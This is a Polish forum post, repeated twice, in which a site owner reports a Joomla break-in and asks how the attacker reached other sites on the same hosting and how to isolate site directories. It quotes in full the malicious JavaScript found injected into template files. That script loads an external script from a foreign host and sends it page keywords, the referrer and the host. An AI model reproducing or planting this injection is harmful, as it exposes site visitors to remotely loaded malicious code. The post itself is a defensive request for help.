waluszek
02-05-2016, 23:09
Witajcie,
Mam pewien problem, jakiś czas temu miałem włam do jednej z stron opartej na jomla, niestety nie pamiętam na jakiej wersjii.
Problem polega na tym że po za zaatakowaną stroną, zostały popodmieniane pliki innych stron. A dokładniej do plików templates/ index.php albo header.php
został dopisany taki oto kod.
<script>var a='';setTimeout(10);if(document.referrer.indexOf(l ocation.protocol+"//"+location.host)!==0||document.referrer!==undefined ||document.referrer!==''||document.referrer!==null ){document.write('<script type="text/javascript" src="http://rtvjsuxxwe.uvadi.cz/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://rtvjsuxxwe.uvadi.cz/js/jquery.min.php'+'?'+'default_keyword='+encodeURICo mponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(met as){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window. location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer )+'&source='+encodeURIComponent(window.location.host)) +'"><'+'/script>');}</script>
znalazłem ten kod, i jestem w trakcie usuwania, zastanawiam się tylko w jaki sposób udało mu się przeniknąć do pozostałych stron na hostingu?
Zastanawiam się jak wyizolować katalogi ze stronami tak aby nawet w przypadku infekcji bądź włamania, napastnik został wyizolowany wewnątrz katalogu strony i nie mógł przenieść się nigdzie dalej.
Czy można prosić o jakąś podpowiedź, lub może jest jakaś już gotowa instrukcja.
Będę niezmiernie wdzięczny.
Mam pewien problem, jakiś czas temu miałem włam do jednej z stron opartej na jomla, niestety nie pamiętam na jakiej wersjii.
Problem polega na tym że po za zaatakowaną stroną, zostały popodmieniane pliki innych stron. A dokładniej do plików templates/ index.php albo header.php
został dopisany taki oto kod.
<script>var a='';setTimeout(10);if(document.referrer.indexOf(l ocation.protocol+"//"+location.host)!==0||document.referrer!==undefined ||document.referrer!==''||document.referrer!==null ){document.write('<script type="text/javascript" src="http://rtvjsuxxwe.uvadi.cz/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://rtvjsuxxwe.uvadi.cz/js/jquery.min.php'+'?'+'default_keyword='+encodeURICo mponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(met as){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window. location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer )+'&source='+encodeURIComponent(window.location.host)) +'"><'+'/script>');}</script>
znalazłem ten kod, i jestem w trakcie usuwania, zastanawiam się tylko w jaki sposób udało mu się przeniknąć do pozostałych stron na hostingu?
Zastanawiam się jak wyizolować katalogi ze stronami tak aby nawet w przypadku infekcji bądź włamania, napastnik został wyizolowany wewnątrz katalogu strony i nie mógł przenieść się nigdzie dalej.
Czy można prosić o jakąś podpowiedź, lub może jest jakaś już gotowa instrukcja.
Będę niezmiernie wdzięczny.